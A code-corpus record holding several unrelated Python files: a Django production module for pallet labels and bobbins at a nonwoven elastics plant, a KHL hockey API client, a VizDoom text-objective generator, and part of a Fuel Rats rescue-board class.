\n data_validade = data_prod + datetime.timedelta(days=356)\n\n gsm = bobine_1.largura.gsm\n\n if cod_cliente_cliente is not None:\n e_f.palete_nome = palete_nome\n e_f.produto = produto\n e_f.largura_bobine = largura_bobine\n e_f.diam_min = diam_min\n e_f.diam_max = diam_max\n e_f.cod_cliente = cod_cliente\n e_f.cod_cliente_cliente = cod_cliente_cliente\n e_f.core = core_bobines\n e_f.area = area\n e_f.comp = comp_total\n e_f.prf = prf\n e_f.num_bobines = num_bobines\n e_f.palete_num = num_palete_carga\n e_f.palete_total = num_paletes_total\n e_f.peso_liquido = peso_liquido\n e_f.peso_bruto = peso_bruto\n e_f.data_prod = data_prod\n e_f.data_validade = data_validade\n e_f.gsm = gsm\n e_f.save()\n else:\n e_f.palete_nome = palete_nome\n e_f.produto = produto\n e_f.largura_bobine = largura_bobine\n e_f.diam_min = diam_min\n e_f.diam_max = diam_max\n e_f.cod_cliente = cod_cliente\n e_f.core = core_bobines\n e_f.area = area\n e_f.comp = comp_total\n e_f.prf = prf\n e_f.num_bobines = num_bobines\n e_f.palete_num = num_palete_carga\n e_f.palete_total = num_paletes_total\n e_f.peso_liquido = peso_liquido\n e_f.peso_bruto = peso_bruto\n e_f.data_prod = data_prod\n e_f.data_validade = data_validade\n e_f.gsm = gsm\n e_f.save()\n \n \n\ndef gerar_etiqueta_final(pk):\n palete = get_object_or_404(Palete, pk=pk)\n e_p = get_object_or_404(EtiquetaPalete, palete=palete)\n bobines = Bobine.objects.filter(palete=palete)\n bobine_1 = Bobine.objects.get(palete=palete, posicao_palete=1)\n palete_nome = e_p.palete_nome\n produto = e_p.produto\n largura_bobines = e_p.largura_bobine\n diam_min = e_p.diam_min\n diam_max = e_p.diam_max\n cliente = e_p.cliente\n cod_cliente = palete.cliente.cod\n core_bobines = palete.core_bobines\n area = palete.area\n comp_total = palete.comp_total\n prf = palete.carga.enc.prf\n order_num = palete.carga.enc.order_num\n num_bobines = palete.num_bobines\n peso_liquido = palete.peso_liquido\n peso_bruto = palete.peso_bruto\n num_paletes_total = palete.carga.num_paletes\n num_palete_carga = palete.num_palete_carga\n artigo = bobine_1.artigo\n ult_cont = EtiquetaFinal.objects.latest('id').cont\n\n\n palete_hora_str = palete.timestamp.strftime('%H')\n palete_hora = int(palete_hora_str)\n turno = ''\n \n if palete_hora >= 8 and palete_hora < 16:\n turno = 'A'\n elif palete_hora >= 16 and palete_hora <= 23:\n turno = 'B'\n elif palete_hora >= 0 and palete_hora < 8:\n turno = 'C'\n \n cod_cliente_cliente = None\n try:\n artigo_cliente = ArtigoCliente.objects.get(artigo=bobine_1.artigo, cliente=palete.cliente)\n cod_cliente_cliente = artigo_cliente.cod_client\n except:\n cod_cliente_cliente = None\n \n\n # if cliente == 'ONTEX':\n # if largura_bobines == 140:\n # cod_cliente_cliente = 'G2.6592'\n # elif largura_bobines == 80:\n # cod_cliente_cliente = 'G2.6590'\n # elif largura_bobines == 70:\n # cod_cliente_cliente = 'G2.6589'\n # elif largura_bobines == 65:\n # cod_cliente_cliente = 'G2.6543'\n # elif largura_bobines == 130:\n # cod_cliente_cliente = 'G2.6591'\n # elif cliente == 'ABENA':\n # if largura_bobines == 150:\n # cod_cliente_cliente = '10000018848'\n # elif cliente == 'Paul Hartman':\n # if largura_bobines == 240:\n # cod_cliente_cliente = 'ELASTEK m16'\n if cliente == 'NUNEX' or cliente == 'Faderco SPA':\n area = (peso_liquido * 1000) / 100 \n comp_total = (Decimal(area) / ((Decimal(num_bobines) * Decimal(largura_bobines)) * Decimal(0.001))) * (Decimal(num_bobines))\n\n\n\n\n if core_bobines == '3':\n core_bobines = 76.6\n elif core_bobines == '6':\n core_bobines = 152.6\n\n 
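# Core codes '3' and '6' (presumably 3-inch and 6-inch cores) are mapped\n    # above to inner diameters of 76.6 mm and 152.6 mm for the final label.\n    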
#data_inicial = palete.carga.data\n data_init = None\n for b in bobines:\n if data_init == None or b.bobinagem.data < data_init:\n data_init = b.bobinagem.data\n data_prod = data_init\n #data_prod = data_inicial\n\n data_validade = data_prod + datetime.timedelta(days=356)\n\n gsm = bobine_1.largura.gsm\n \n cont = ult_cont + 1\n gtin = artigo.gtin\n # control = cont\n # gtin_str = (str(gtin)[:-2])\n # sscc_str = \"0\" + gtin_str + str(cont) + str(control)\n # sscc = sscc_str\n \n if EtiquetaFinal.objects.filter(palete=palete).exists():\n e_f_e = EtiquetaFinal.objects.filter(palete=palete)\n for e in e_f_e:\n e.activa = False\n e.save()\n\n \n if cod_cliente_cliente is not None:\n e_f = EtiquetaFinal.objects.create(cont=cont, gtin=gtin, palete=palete, palete_nome=palete_nome, produto=produto, largura_bobine=largura_bobines, diam_min=diam_min, diam_max=diam_max, cod_cliente=cod_cliente, cod_cliente_cliente=cod_cliente_cliente, core=core_bobines, area=area, comp=comp_total, prf=prf, num_bobines=num_bobines, palete_num=num_palete_carga, palete_total=num_paletes_total, peso_liquido=peso_liquido, peso_bruto=peso_bruto, data_prod=data_prod, data_validade=data_validade, gsm=gsm, order_num=order_num, turno=turno)\n else:\n e_f = EtiquetaFinal.objects.create(cont=cont, gtin=gtin, palete=palete, palete_nome=palete_nome, produto=produto, largura_bobine=largura_bobines, diam_min=diam_min, diam_max=diam_max, cod_cliente=cod_cliente, core=core_bobines, area=area, comp=comp_total, prf=prf, num_bobines=num_bobines, palete_num=num_palete_carga, palete_total=num_paletes_total, peso_liquido=peso_liquido, peso_bruto=peso_bruto, data_prod=data_prod, data_validade=data_validade, gsm=gsm, order_num=order_num, turno=turno)\n \n\ndef add_artigo_to_bobine(pk):\n palete = get_object_or_404(Palete, pk=pk)\n bobines = Bobine.objects.filter(palete=palete)\n cliente = palete.cliente\n artigos = Artigo.objects.all()\n \n if cliente.nome == 'BB DISTRIBE SAS':\n for b in bobines:\n if (b.largura.largura == 160 and b.palete.cliente.diam_ref == 1200 and b.bobinagem.perfil.core == '6' and b.largura.gsm == '100' and b.largura.designacao_prod == 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE'):\n artigo = get_object_or_404(Artigo, pk=61)\n b.artigo = artigo\n b.save()\n else:\n for a in artigos:\n if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n artigo = get_object_or_404(Artigo, pk=a.pk)\n b.artigo = artigo\n b.save()\n\n elif cliente.nome == 'Faderco SPA':\n for b in bobines:\n if (b.largura.largura == 160 and b.palete.cliente.diam_ref == 1200 and b.bobinagem.perfil.core == '6' and b.largura.gsm == '100' and b.largura.designacao_prod == 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE'):\n artigo = get_object_or_404(Artigo, pk=48)\n b.artigo = artigo\n b.save()\n else:\n for a in artigos:\n if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n artigo = get_object_or_404(Artigo, pk=a.pk)\n b.artigo = artigo\n b.save()\n\n elif cliente.nome == 'ENKA HIJYEN' or cliente.nome == 'PAKTEN SAGLIK URUNLERI' :\n for b in bobines:\n if (b.largura.largura == 75 and b.palete.cliente.diam_ref == 1100 and b.bobinagem.perfil.core == '6' and b.largura.gsm == '100' and b.largura.designacao_prod == 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE'):\n artigo = get_object_or_404(Artigo, pk=66)\n b.artigo = 
artigo\n                b.save()\n            else:\n                for a in artigos:\n                    if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n                        artigo = get_object_or_404(Artigo, pk=a.pk)\n                        b.artigo = artigo\n                        b.save()\n\n    else:\n        for b in bobines:\n            for a in artigos:\n                if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n                    artigo = get_object_or_404(Artigo, pk=a.pk)\n                    b.artigo = artigo\n                    b.save()\n\n# def palete_carga_num(carga_pk, palete_pk):\n#     carga = get_object_or_404(Carga, pk=carga_pk)\n#     palete = get_object_or_404(Palete, pk=palete_pk)\n    \n#     paletes_carga_1 = Palete.objects.filter(carga=carga)\n#     cont1 = 0\n#     array_num_palete = []\n    \n#     for p1 in paletes_carga_1:\n#         array_num_palete[cont1] = p1.num_palete_carga\n#         cont1 += 1\n\n#     if len(array_num_palete) == 0:\n#         palete.num_palete_carga = 1\n#     else:\n#         array_num_palete.sort()\n#         cont2 = 0\n#         for a in array_num_palete:\n#             if a[cont2] != cont2 + 1:\n#                 palete.num_palete_carga = cont2 + 1\n#                 break\n#             elif len(array_num_palete) == cont2 + 1:\n#                 palete.num_palete_carga = cont2 + 2\n#                 break \n#             cont2 += 1\n    \n#     palete.save()\n    \n\ndef comp_dm(b1, m1, b2, m2, b3, m3):\n    b_1 = Bobine.objects.get(pk=b1.pk)\n    \n    try:\n        b_2 = Bobine.objects.get(pk=b2.pk)\n    except:\n        b_2 = \"N/A\"\n        m_2 = \"N/A\"\n    \n    try:\n        b_3 = Bobine.objects.get(pk=b3.pk)\n    except:\n        b_3 = \"N/A\"\n        m_3 = \"N/A\"\n\n    if b_1 != \"N/A\" and b_2 != \"N/A\" and b_3 != \"N/A\":\n        comp_total = int(m1) + int(m2) + int(m3)\n    elif b_1 != \"N/A\" and b_2 != \"N/A\":\n        comp_total = int(m1) + int(m2)\n    elif b_1 != \"N/A\":\n        comp_total = int(m1)\n\n    return comp_total\n\n\ndef retrabalho_nome(pk, emendas):\n    bobinagem = Bobinagem.objects.get(pk=pk)\n    bobines = Bobine.objects.filter(bobinagem=bobinagem)\n    data = bobinagem.data\n    data = data.strftime('%Y%m%d')\n    map(int, data)\n    if emendas > 1:\n        if bobinagem.num_bobinagem < 10:\n            bobinagem.nome = '3%s-0%s' % (data[1:], bobinagem.num_bobinagem)\n            bobinagem.save()\n        else:\n            bobinagem.nome = '3%s-%s' % (data[1:], bobinagem.num_bobinagem)\n            bobinagem.save()\n\n        for b in bobines:\n            if b.largura.num_bobine < 10:\n                b.nome = '%s-0%s' % (bobinagem.nome, b.largura.num_bobine)\n                b.save()\n            else:\n                b.nome = '%s-%s' % (bobinagem.nome, b.largura.num_bobine)\n                b.save()\n    \n    \n    \ndef recycling_bobine(pk):\n    bobines = []\n    bobinagem = get_object_or_404(Bobinagem, pk=pk)\n    emendas = Emenda.objects.filter(bobinagem=bobinagem)\n    for e in emendas:\n        if e.bobine.recycle == True:\n            bobines.append(e.bobine)\n    \n    print(bobines)\n\n    # Remove the bobine from its palete and recalculate the palete fields\n    for b in bobines:\n        if b.palete != None:\n            palete = get_object_or_404(Palete, pk=b.palete.pk)\n            posicao_palete = b.posicao_palete\n            b.palete = None\n            b.posicao_palete = None\n            palete.area -= b.area\n            palete.comp_total -= b.bobinagem.comp_cli\n            palete.num_bobines -= 1\n            palete.num_bobines_act -= 1\n            palete.save()\n\n            # Fix the positions of the remaining bobines on the palete\n            bobines_palete = Bobine.objects.filter(palete=palete).order_by('posicao_palete')\n            count = 1\n            for bp in bobines_palete:\n                if bp.posicao_palete == count:\n                    count += 1\n                    bp.save()\n                else: \n                    bp.posicao_palete = count\n                    count += 1\n                    bp.save()\n\n    # Palete label (etiqueta)\n    \n    return print('recycling_bobine')\n\ndef invert_recycle_bobine(pk):\n\n    return print('invert_recycle_bobine')\n\ndef 
cancel_insert_larguras(request, pk):\n perfil = get_object_or_404(Perfil, pk=pk)\n larguras = Largura.objects.filter(perfil=perfil)\n for l in larguras:\n l.delete()\n\n \n if perfil.retrabalho == False:\n perfil.delete()\n return redirect('producao:perfil_create_linha_v2')\n else:\n perfil.delete()\n return redirect('producao:perfil_create_dm_v2')\n\ndef create_perfil_token(num_bobines, produto, core, larguras, produtos, gsms, retrabalho, core_original, largura_original, clientes, artigos):\n \n produtos_dict = {\n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE': 'A',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HT': 'B',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 95 HE': 'C', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 90 HE HL': 'D', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 95 HE HL': 'E', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 90 HT HL': 'F', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 95 HE HL': 'G', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 100 HE HL': 'H', \n 'SIDE PANEL ELA-ACE 100 HE': 'I',\n 'NONWOVEN ELASTIC BANDS ELA-SPUN 100 HE BICO': 'J',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 105 HE': 'K', \n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE(D)': 'L', \n 'FRONTAL TAPE 48': 'M', \n 'CAR PROTECTION SHEET 57': 'N', \n 'ELASTIC FILM': 'O',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE(L)': 'P',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 75 HE': 'Q',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 95 HT': 'R',\n 'NONWOVEN ELASTIC BANDS ELA-SPUN 60 HE': 'S',\n 'NONWOVEN ELASTIC BANDS ELA-SPUN 60 HT': 'T',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 50 23B': 'U',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 50 23A':'V',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 45 16B': 'W',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 45 16A': 'X',\n 'STRETCHABLE NONWOVEN ELASTIC BANDS ELA-ACE 100 HE': 'Y',\n 'NONWOVEN ELASTIC BAND ELA-CARDED AMOSTRA': 'Z',\n 'NONWOVEN ELASTIC BAND ELA-CARDED 100 HE': 'AA',\n 'NONWOVEN ELASTIC BAND ELA-SPUN 75 HT': 'AB',\n\t 'NONWOVEN ELASTIC BAND ELA-CARDED 100': 'AC',\n\t 'NONWOVEN ELASTIC BAND 100 HE NON WOVEN STRETCH EAR': 'AD',\n\t 'NONWOVEN ELASTIC BAND ELA-ACE 100 T-HT': 'AE',\n\t 'NONWOVEN ELASTIC BAND ELA-ACE 100 T-HE': 'AF',\n 'NONWOVEN ELASTIC BAND ELA-ACE 100 HE(L) PUNCTURED': 'AG',\n 'NONWOVEN ELASTIC BAND ELA-ACE 95 T-HE': 'AH',\n 'NONWOVEN ELASTIC BAND ELA-CARDED 80': 'AI',\n 'Nonwoven Elastic Band ELA-ACE Amostra': 'AJ',\n 'NW Elastic Bands ELA-ACE 100 HE (L) PUNCTURED Amostra': 'AK'\n\n }\n\n gsm_dict = {\n '105': '1',\n '100': '2',\n '95': '3',\n '90': '4',\n '80': '5',\n '57': '6',\n '50': '7',\n '48': '8',\n '75': '9',\n '60': '10',\n '45': '11',\n '25': '12',\n }\n\n token = '' + str(num_bobines) + produtos_dict.get(produto) + core \n\n for l in larguras:\n token += str(l)\n\n for p in produtos:\n token += produtos_dict.get(p)\n \n for gsm in gsms:\n token += gsm_dict.get(gsm)\n \n for cliente in clientes:\n if cliente != None:\n token += str(cliente.pk)\n else:\n token += 'N'\n \n for artigo in artigos:\n if artigo != None:\n token += str(artigo.pk)\n else:\n token += 'N'\n \n if retrabalho == True:\n token = 'DM' + token + str(core_original) + str(largura_original)\n else:\n token = 'L1' + token\n \n return token\n\ndef edit_bobine(pk):\n bobinagem = get_object_or_404(Bobinagem, pk=pk)\n bobines = Bobine.objects.filter(bobinagem=bobinagem)\n desp_bobine = bobinagem.desper / Decimal(bobinagem.perfil.num_bobines)\n\n for bob in bobines:\n bob.comp = bobinagem.comp_cli\n bob.comp_actual = bobinagem.comp_cli\n largura = bob.largura.largura / 1000\n bob.area = largura * bob.bobinagem.comp_cli\n\n if bobinagem.tipo_desp == 'R':\n bob.tipo_desp = 'R'\n bob.desp = 
desp_bobine\n elif bobinagem.tipo_desp == 'BA':\n bob.tipo_desp = 'BA'\n bob.desp = desp_bobine\n bob.save()\n etiqueta = get_object_or_404(EtiquetaRetrabalho, bobine=bob.nome)\n etiqueta.diam = bobinagem.diam\n etiqueta.comp_total = bobinagem.comp_cli\n etiqueta.area = bob.area\n etiqueta.save()\n\n\n\n# def delete_sessions():\n# if datetime.now() == '12:54':\n# Session.objects.all().delete()\n\n\n\ndef multipleOf10(num):\n\n result = num%10\n print(result)\n\n return result","sub_path":"sistema/producao/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":36990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"45930284","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\n\nclass KHLAPI:\n tournamentId = 0\n\n url = 'http://khl.egluservices.com/services/query.php'\n\n headers = {\n 'User-Agent': 'КХЛ/3013 CFNetwork/758.0.2 Darwin/15.0.0',\n }\n\n base = {\n 'os': 'android',\n 'lang': 'ru',\n }\n\n def _req(self, payload):\n payload.update(self.base)\n r = requests.post(url=self.url, data=payload, headers=self.headers)\n\n if r.status_code != 200:\n return False\n\n return r.json()\n\n def setTournament(self, tournamentId):\n self.tournamentId = tournamentId\n\n return self\n\n def getAllTournaments(self):\n \"\"\"Чемпионаты\"\"\"\n payload = {\n 'requestName': 'allTournaments',\n }\n\n return self._req(payload)\n\n def getTeamList(self):\n \"\"\"Команды турнира\"\"\"\n payload = {\n 'requestName': 'teamList',\n 'tournamentId': self.tournamentId,\n }\n\n return self._req(payload)\n\n def getTeamMembers(self, teamId):\n \"\"\"Состав команды турнира\"\"\"\n payload = {\n 'requestName': 'teamMembers',\n 'tournamentId': self.tournamentId,\n 'teamId': teamId,\n }\n\n return self._req(payload)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"215366365","text":"import numpy as np\n\nimport nltk\nimport string\nfrom nltk.stem import PorterStemmer\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle as pkl\n\nimport json\nimport os\n\nimport random\n\nclass TokenizeStemSentence(object):\n\n def __init__(self):\n self.stemmer = PorterStemmer()\n self.trans_table = str.maketrans(dict.fromkeys(string.punctuation))\n self.stop_word = nltk.corpus.stopwords.words('english')\n\n def tokenize_and_stem(self, sentence):\n sentence_wordlist = []\n sentence_wo_punct = str.translate(sentence, self.trans_table)\n words = nltk.tokenize.word_tokenize(sentence_wo_punct)\n\n for raw_word in words:\n word = raw_word.lower()\n if word not in self.stop_word:\n sentence_wordlist.append(self.stemmer.stem(word))\n\n return sentence_wordlist\n\n def __call__(self, sentence):\n return self.tokenize_and_stem(sentence=sentence)\n\n\nclass TextToIds(object):\n def __init__(self, max_sentence_length, path_to_vocab=\"data/text/vocabulary.pkl\"):\n\n self.path_to_vocabulary = path_to_vocab\n vocab_dict = pkl.load(open(self.path_to_vocabulary, 'rb'))\n self.all_words, self.max_sentence_length = vocab_dict['all_words'], vocab_dict['max_sentence_length']\n\n self.max_sentence_length = max_sentence_length\n\n self.tokenizer = TokenizeStemSentence()\n self.word_to_id = LabelEncoder()\n\n all_words_encoded = self.word_to_id.fit_transform(np.array(list(self.all_words)))\n\n self.eos_id = int(self.word_to_id.transform(['eos'])[0])\n\n def pad_encode(self, sentence):\n sentence = self._sentence_to_matrix(sentence)\n 
sentence, sentence_length = self._pad(sentence=sentence)\n        return sentence, sentence_length\n\n    def _sentence_to_matrix(self, sentence):\n        sentence_array = np.array(self.tokenizer(sentence))\n        sentence_encoded = self.word_to_id.transform(sentence_array)\n\n        return sentence_encoded\n\n    def _pad(self, sentence):\n        sentence_length = len(sentence)\n        n_padding = self.max_sentence_length - sentence_length\n        if n_padding != 0:\n            padding = np.ones(n_padding)*self.eos_id\n            sentence = np.concatenate((sentence, padding), axis=0)\n        return sentence, sentence_length\n\nclass TextObjectiveGenerator(object):\n\n    def __init__(self, env_specific_vocab,\n                 path_to_text=\"/home/sequel/mseurin/gym-vizdoom/gym_vizdoom/envs/data/Basic\",\n                 #path_to_text=\"../gym-vizdoom/gym_vizdoom/envs/data/Basic\",\n                 sentence_file=\"sentences.json\",\n                 mode=\"simple\"):\n        \"\"\"\n        :param env_specific_vocab: a list of words that are being used in the env calling this Objective Generator.\n        :param mode : can be simple, medium, hard\n        \"\"\"\n\n        self.path_to_text = path_to_text\n\n        self.path_to_sentences = os.path.join(self.path_to_text, sentence_file)\n        self.path_to_vocabulary = os.path.join(self.path_to_text, 'vocabulary.pkl')\n\n        # can be color, name of object etc ..., will be used to fill template\n        self.env_specific_vocab = env_specific_vocab\n\n        self.tokenize_sentence = TokenizeStemSentence()\n\n        # Token like : begin of sentence, end of sentence etc ...\n        self.special_tokens = ['eos']\n\n        self.all_sentences_template = {} # keys are : sentence_color, absolute_position_sentence, relative_position_sentence\n        self.load_sentences()\n\n        if os.path.exists(self.path_to_vocabulary):\n            vocab = pkl.load(open(self.path_to_vocabulary, 'rb'))\n            self.all_words = vocab[\"all_words\"]\n            self.max_sentence_length = vocab[\"max_sentence_length\"]\n        else:\n            self.build_vocabulary()\n\n        self.voc_size = len(self.all_words)\n        #print(self.all_words)\n\n        # Regarding difficulty of the task\n        self.keys = [\"sentence_color\", \"absolute_position_sentence\", \"relative_position_sentence\"]\n        self.mode = mode\n\n        self.text_to_id = TextToIds(max_sentence_length=self.max_sentence_length,\n                                    path_to_vocab=self.path_to_vocabulary)\n\n        self.text_shape = (self.max_sentence_length,)\n\n\n    def sample(self, color, position, other_color):\n        def _choice_color(sentences_template, color, position, other_color):\n            random_sentence = random.choice(sentences_template[\"sentence_color\"])\n            random_sentence = random_sentence.format(color=color.lower())\n            #print(random_sentence)\n            return random_sentence\n\n        def _choice_abs_position(sentences_template, color, position, other_color):\n            random_sentence = random.choice(sentences_template[\"absolute_position_sentence\"][str(position)])\n            return random_sentence\n\n        def _choice_rel_position(sentences_template, color, position, other_color):\n            raise NotImplementedError(\"Relative position not implemented yet\")\n\n        all_choices_function = [_choice_color, _choice_abs_position, _choice_rel_position]\n\n        if self.mode == \"simple\" :\n            possible_function = [all_choices_function[0]]\n        elif self.mode == \"medium\" :\n            possible_function = all_choices_function[:2]\n        elif self.mode == \"hard\":\n            possible_function = all_choices_function[:3]\n        else:\n            assert False, \"Wrong difficulty parameters, should be simple, medium, hard. 
Not '{}'\".format(self.mode)\n\n random_selector = random.randint(0, len(possible_function)-1) # -1 because randint include upper bound\n # call a random sampler based on all objective possibility\n random_sentence = possible_function[random_selector](self.all_sentences_template, color, position, other_color)\n\n return self.text_to_id.pad_encode(random_sentence)\n\n def load_sentences(self):\n\n self.all_sentences_template = json.load(open(self.path_to_sentences))\n\n def build_vocabulary(self):\n\n def _recurse_vocab_builder(sentences, all_word_list, maximum_sent_length):\n \"\"\"\n Build vocabulary from nested dictionnary\n :param sentences: dictionnary to retrieve vocabulary from\n :param all_word_list: should be [] when called for first time\n :return: list of all word in nested dictionnary\n \"\"\"\n\n if type(sentences) is list:\n new_words = []\n for sentence in sentences:\n sentence.replace('{color}', '')\n #print(sentence)\n temp_words = self.tokenize_sentence(sentence)\n #print(temp_words)\n maximum_sent_length = max(len(temp_words), maximum_sent_length)\n\n new_words.extend(temp_words)\n\n elif type(sentences) is dict:\n\n new_words = []\n for key, item in sentences.items():\n more_words, sub_max_length = _recurse_vocab_builder(item, all_word_list, maximum_sent_length=maximum_sent_length)\n new_words.extend(more_words)\n maximum_sent_length = max(maximum_sent_length, sub_max_length)\n\n else:\n assert False, \"Should be list or dict, no way around. Is {}\".format(type(sentences))\n\n all_word_list.extend(new_words)\n\n return all_word_list, maximum_sent_length\n\n all_words = set([self.tokenize_sentence.stemmer.stem(word.lower()) for word in self.env_specific_vocab])\n\n # Retrieve vocab from templates and add it to vocabulary\n words_from_sentences, self.max_sentence_length = _recurse_vocab_builder(sentences=self.all_sentences_template,\n all_word_list=[],\n maximum_sent_length=0)\n\n words_from_sentences = set(words_from_sentences)\n all_words = all_words.union(words_from_sentences)\n self.all_words = all_words.union(set(self.special_tokens))\n\n # Save vocabulary for later usage in model\n print(\"Saving vocab, vocab size is {}, max length is {}\".format(len(self.all_words), self.max_sentence_length))\n pkl.dump({\"all_words\" : self.all_words, \"max_sentence_length\": self.max_sentence_length}, open(self.path_to_vocabulary, 'wb'))","sub_path":"gym_vizdoom/envs/text_utils.py","file_name":"text_utils.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"605743992","text":"\"\"\"\nrat_rescue.py - Rescue board and objects\n\nCopyright (c) 2018 The Fuel Rat Mischief,\nAll rights reserved.\n\nLicensed under the BSD 3-Clause License.\n\nSee LICENSE.md\n\nThis module is built on top of the Pydle system.\n\"\"\"\nimport logging\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import reduce\nfrom operator import xor\nfrom typing import Union, Optional, List, TYPE_CHECKING\nfrom uuid import UUID\n\nfrom Modules.epic import Epic\nfrom Modules.mark_for_deletion import MarkForDeletion\nfrom Modules.rat import Rat\nfrom Modules.rat_cache import RatCache\nfrom Modules.rat_quotation import Quotation\nfrom utils.ratlib import Platforms, Status\n\nif TYPE_CHECKING:\n from Modules.rat_board import RatBoard\n\nlog = logging.getLogger(f\"mecha.{__name__}\")\n\n\nclass Rescue(object):\n \"\"\"\n A unique rescue\n \"\"\"\n\n def __init__(self, uuid: UUID = None,\n 
client: Optional[str] = None,\n                 system: Optional[str] = None,\n                 irc_nickname: Optional[str] = None,\n                 board: 'RatBoard' = None,\n                 created_at: Optional[datetime] = None,\n                 updated_at: Optional[datetime] = None,\n                 unidentified_rats: Optional[List[str]] = None,\n                 active: bool = True,\n                 quotes: Optional[List[Quotation]] = None,\n                 epic: List[Epic] = None,\n                 title: Optional[str] = None,\n                 first_limpet: Optional[UUID] = None,\n                 board_index: Optional[int] = None,\n                 mark_for_deletion: MarkForDeletion = MarkForDeletion(),\n                 lang_id: str = \"EN\",\n                 rats: List[Rat] = None,\n                 status: Status = Status.OPEN,\n                 code_red=False):\n        \"\"\"\n        creates a unique rescue\n\n        Args:\n\n            code_red (bool): is the client on emergency oxygen\n            status (Status): status attribute for the rescue\n            board (RatBoard): RatBoard instance this rescue is attached to, if any.\n            uuid (UUID): API id of rescue\n            client (str): Commander name of the Commander rescued\n            system (str): System name the Commander is stranded in\n                (WILL BE CAST TO UPPER CASE)\n            created_at (datetime): time the case was first created\n                **( READONLY )**\n            updated_at (datetime): last time the case was modified\n            unidentified_rats (list): list of unidentified rats responding to\n                rescue **(nicknames)**\n            active (bool): marks whether the case is active or not\n            quotes (list): list of Quotation objects associated with rescue\n            epic (list): Epic objects associated with the rescue, if any\n            title (str): name of operation, if applicable\n            first_limpet (UUID): Id of the rat that got the first limpet\n            board_index (int): index position on the board, if any.\n            mark_for_deletion (dict): the markForDeletion object for the API,\n                if any.\n                - will default to open and not MD'ed\n            lang_id (str): language ID of the client, defaults to english.\n            irc_nickname (str): clients IRC nickname, may differ from their\n                commander name.\n            rats (list): identified (Rat)s assigned to rescue.\n        \"\"\"\n        self._platform: Platforms = None\n        self.rat_board: 'RatBoard' = board\n        self._rats = rats if rats else []\n        self._createdAt: datetime = created_at if created_at else datetime.utcnow()\n        self._updatedAt: datetime = updated_at if updated_at else datetime.utcnow()\n        self._api_id: UUID = uuid\n        self._client: str = client\n        self._irc_nick: str = irc_nickname\n        self._unidentified_rats = unidentified_rats if unidentified_rats else []\n        self._system: Optional[str] = system.upper() if system else None\n        self._active: bool = active\n        self._quotes: list = quotes if quotes else []\n        self._epic: List[Epic] = epic if epic is not None else []\n        self._codeRed: bool = code_red\n        self._outcome: None = None\n        self._title: Union[str, None] = title\n        self._firstLimpet: UUID = first_limpet\n        self._board_index = board_index\n        self._mark_for_deletion = mark_for_deletion\n        self._lang_id = lang_id\n        self._status = status\n        self._hash = None\n\n    def __eq__(self, other) -> bool:\n        \"\"\"\n        Verify `other` is equal to self.\n\n        Args:\n            other (Rescue): Rescue to compare against\n\n        Returns:\n            bool: is equivalent\n        \"\"\"\n        if not isinstance(other, Rescue):\n            # instance type check\n            return NotImplemented\n        else:\n            # check equality\n\n            conditions = [\n                self.uuid == other.uuid,\n                self.board_index == other.board_index,\n                self.client == other.client,\n                self.rats == other.rats,\n                self.platform == other.platform,\n                self.first_limpet == other.first_limpet,\n                self.created_at == other.created_at,\n                self.updated_at == other.updated_at,\n                self.system == other.system,\n                self.unidentified_rats == other.unidentified_rats,\n                self.active == other.active,\n                
self.code_red == other.code_red,\n self.outcome == other.outcome,\n self.title == other.title,\n self.first_limpet == other.first_limpet,\n self.marked_for_deletion == other.marked_for_deletion,\n self.lang_id == other.lang_id,\n self.rats == other.rats,\n self.irc_nickname == other.irc_nickname,\n ]\n\n return all(conditions)\n\n def __hash__(self):\n\n if self._hash is None:\n attributes = (\n self.uuid,\n self.board_index,\n self.client,\n self.platform,\n self.first_limpet,\n self.created_at,\n self.updated_at,\n self.system,\n self.active,\n self.code_red,\n self.outcome,\n self.title,\n self.first_limpet,\n self.lang_id,\n self.irc_nickname,\n )\n\n self._hash = reduce(xor, map(hash, attributes))\n return self._hash\n\n @property\n def status(self) -> Status:\n \"\"\"\n Status enum for the rescue\n\n Returns:\n Status\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, value: status):\n \"\"\"\n Set the value of the status enum\n\n Args:\n value (Status): new status enum\n\n Raises:\n TypeError: invalid `value` type\n 